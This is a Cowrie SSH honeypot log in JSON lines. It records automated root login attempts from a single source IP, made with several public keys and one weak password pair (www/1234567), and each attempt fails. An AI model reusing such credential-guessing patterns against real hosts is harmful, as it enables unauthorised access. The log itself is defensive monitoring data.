{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-31T07:01:06.155362Z","src_ip":"212.227.235.229","session":"b9d5c9e1e69f"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:01:06.156073Z","src_ip":"212.227.235.229","session":"b9d5c9e1e69f"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"46:1b:59:74:3e:24:19:b3:09:80:6d:32:33:a5:e4:d4","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILZMR3AsV6mzndFLFF/oghW+bs9yVkvvvhhHGT7e167k","type":"ssh-ed25519","message":"public key attempt for user root of type ssh-ed25519 with fingerprint 46:1b:59:74:3e:24:19:b3:09:80:6d:32:33:a5:e4:d4","sensor":"my-vps","timestamp":"2025-08-31T07:01:06.506331Z","src_ip":"212.227.235.229","session":"b9d5c9e1e69f"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"46:1b:59:74:3e:24:19:b3:09:80:6d:32:33:a5:e4:d4","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILZMR3AsV6mzndFLFF/oghW+bs9yVkvvvhhHGT7e167k","type":"ssh-ed25519","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:01:06.507257Z","src_ip":"212.227.235.229","session":"b9d5c9e1e69f"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:01:06.858567Z","src_ip":"212.227.235.229","session":"b9d5c9e1e69f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34564,"dst_ip":"1.2.3.4","dst_port":22,"session":"dceaaa2f946b","protocol":"ssh","message":"New connection: 212.227.235.229:34564 (1.2.3.4:22) [session: dceaaa2f946b]","sensor":"my-vps","timestamp":"2025-08-31T07:01:07.213439Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-31T07:01:07.214336Z","src_ip":"212.227.235.229","session":"dceaaa2f946b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:01:07.569370Z","src_ip":"212.227.235.229","session":"dceaaa2f946b"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-31T07:01:08.281804Z","src_ip":"212.227.235.229","session":"dceaaa2f946b"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:01:08.282387Z","src_ip":"212.227.235.229","session":"dceaaa2f946b"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"31:37:b7:f7:a7:6a:40:55:79:fe:90:69:de:35:05:67","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGnSXQwfse2xGZ6wGn3ng++QmelqwRocuAXe82dFpc/3","type":"ssh-ed25519","message":"public key attempt for user root of type ssh-ed25519 with fingerprint 31:37:b7:f7:a7:6a:40:55:79:fe:90:69:de:35:05:67","sensor":"my-vps","timestamp":"2025-08-31T07:01:08.639039Z","src_ip":"212.227.235.229","session":"dceaaa2f946b"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"31:37:b7:f7:a7:6a:40:55:79:fe:90:69:de:35:05:67","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGnSXQwfse2xGZ6wGn3ng++QmelqwRocuAXe82dFpc/3","type":"ssh-ed25519","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:01:08.639707Z","src_ip":"212.227.235.229","session":"dceaaa2f946b"}
{"eventid":"cowrie.login.failed","username":"www","password":"1234567","message":"login attempt [www/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T07:01:08.915035Z","src_ip":"212.227.235.229","session":"7b630c18ac50"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:01:08.997093Z","src_ip":"212.227.235.229","session":"dceaaa2f946b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34578,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f73fb32fffd","protocol":"ssh","message":"New connection: 212.227.235.229:34578 (1.2.3.4:22) [session: 7f73fb32fffd]","sensor":"my-vps","timestamp":"2025-08-31T07:01:09.346543Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-31T07:01:09.347428Z","src_ip":"212.227.235.229","session":"7f73fb32fffd"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:01:09.697512Z","src_ip":"212.227.235.229","session":"7f73fb32fffd"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-31T07:01:10.399173Z","src_ip":"212.227.235.229","session":"7f73fb32fffd"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:01:10.400003Z","src_ip":"212.227.235.229","session":"7f73fb32fffd"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:01:10.704057Z","src_ip":"212.227.235.229","session":"7b630c18ac50"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"3a:2d:90:7f:db:51:ac:5b:99:5c:30:41:9b:50:60:e6","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5Nt1BKYKiIrQtwJr1aNgczUzEykIW1/GPIslxUqW6nhRXhqS4+er4PXDg8m8jvsNhbocnhA5J52B1yzB5DJE0xeog/AWhw82CmHaTdP0UWaxxsGmw22lxqWpT+KuLQ210s8jhXVE6KyXAm+aYPGSZIefPW7FphSTsEi/+wv5lzGfdi5VvcZboChKkpxEzpZ2uBl5vaMKKdZUMjy0rr03pb1bmD9JBBcMvEK6yN3wLbfsiDUOWLULbkKHi2C3L39D/z2y1ZOpGlFMinAANUCBt8RCDr0BCrR9AwIsbJS8IRft7/8Y3dK4q8ZU799wv4GUt7Amz2dIiC1nvp0nzp8s5","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 3a:2d:90:7f:db:51:ac:5b:99:5c:30:41:9b:50:60:e6","sensor":"my-vps","timestamp":"2025-08-31T07:01:10.752273Z","src_ip":"212.227.235.229","session":"7f73fb32fffd"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"3a:2d:90:7f:db:51:ac:5b:99:5c:30:41:9b:50:60:e6","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5Nt1BKYKiIrQtwJr1aNgczUzEykIW1/GPIslxUqW6nhRXhqS4+er4PXDg8m8jvsNhbocnhA5J52B1yzB5DJE0xeog/AWhw82CmHaTdP0UWaxxsGmw22lxqWpT+KuLQ210s8jhXVE6KyXAm+aYPGSZIefPW7FphSTsEi/+wv5lzGfdi5VvcZboChKkpxEzpZ2uBl5vaMKKdZUMjy0rr03pb1bmD9JBBcMvEK6yN3wLbfsiDUOWLULbkKHi2C3L39D/z2y1ZOpGlFMinAANUCBt8RCDr0BCrR9AwIsbJS8IRft7/8Y3dK4q8ZU799wv4GUt7Amz2dIiC1nvp0nzp8s5","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:01:10.752855Z","src_ip":"212.227.235.229","session":"7f73fb32fffd"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:01:11.103568Z","src_ip":"212.227.235.229","session":"7f73fb32fffd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34580,"dst_ip":"1.2.3.4","dst_port":22,"session":"b430535d4502","protocol":"ssh","message":"New connection: 212.227.235.229:34580 (1.2.3.4:22) [session: b430535d4502]","sensor":"my-vps","timestamp":"2025-08-31T07:01:11.456595Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-31T07:01:11.457598Z","src_ip":"212.227.235.229","session":"b430535d4502"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:01:11.811648Z","src_ip":"212.227.235.229","session":"b430535d4502"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-31T07:01:12.522729Z","src_ip":"212.227.235.229","session":"b430535d4502"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:01:12.523369Z","src_ip":"212.227.235.229","session":"b430535d4502"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"23:c8:64:09:84:20:35:9f:76:8a:09:2d:8b:cf:48:33","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTpdG+f24ZLGM1XY2PTbBvm+Xqqf9ryjietrZ8ZznOo3IoqOzjPmdNJugKYS4Qaom1HCOTQdLzxTYKwlNUSe6lvcyirfQzgzBUsh4dCQ42oILJMsEFp2gwiqx/MnT5w+gITwsHFovX/Sm6RzxNRokQST9vduiHEZ3ytfiFolrPIu9ZLkWm/2fgvaAhu8Z6hAhpObjitg44rkG2QI2gdIiMSF2bMmErzZHD471e2Yl8ryEpzHX731db7CSL/3v5qUR1FRAXcovO4lVL0EMfE0NE6MV4TVoAQaWtAo4WuIEVzAPXHA/KezhX92V8WhG7Zt1Nto2rQvTY04lJuUDZNr5t","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 23:c8:64:09:84:20:35:9f:76:8a:09:2d:8b:cf:48:33","sensor":"my-vps","timestamp":"2025-08-31T07:01:12.878557Z","src_ip":"212.227.235.229","session":"b430535d4502"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"23:c8:64:09:84:20:35:9f:76:8a:09:2d:8b:cf:48:33","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTpdG+f24ZLGM1XY2PTbBvm+Xqqf9ryjietrZ8ZznOo3IoqOzjPmdNJugKYS4Qaom1HCOTQdLzxTYKwlNUSe6lvcyirfQzgzBUsh4dCQ42oILJMsEFp2gwiqx/MnT5w+gITwsHFovX/Sm6RzxNRokQST9vduiHEZ3ytfiFolrPIu9ZLkWm/2fgvaAhu8Z6hAhpObjitg44rkG2QI2gdIiMSF2bMmErzZHD471e2Yl8ryEpzHX731db7CSL/3v5qUR1FRAXcovO4lVL0EMfE0NE6MV4TVoAQaWtAo4WuIEVzAPXHA/KezhX92V8WhG7Zt1Nto2rQvTY04lJuUDZNr5t","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:01:12.879290Z","src_ip":"212.227.235.229","session":"b430535d4502"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:01:13.233941Z","src_ip":"212.227.235.229","session":"b430535d4502"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49862,"dst_ip":"1.2.3.4","dst_port":22,"session":"f404dd30430b","protocol":"ssh","message":"New connection: 212.227.235.229:49862 (1.2.3.4:22) [session: f404dd30430b]","sensor":"my-vps","timestamp":"2025-08-31T07:01:13.593725Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-31T07:01:13.594386Z","src_ip":"212.227.235.229","session":"f404dd30430b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:01:13.954726Z","src_ip":"212.227.235.229","session":"f404dd30430b"}
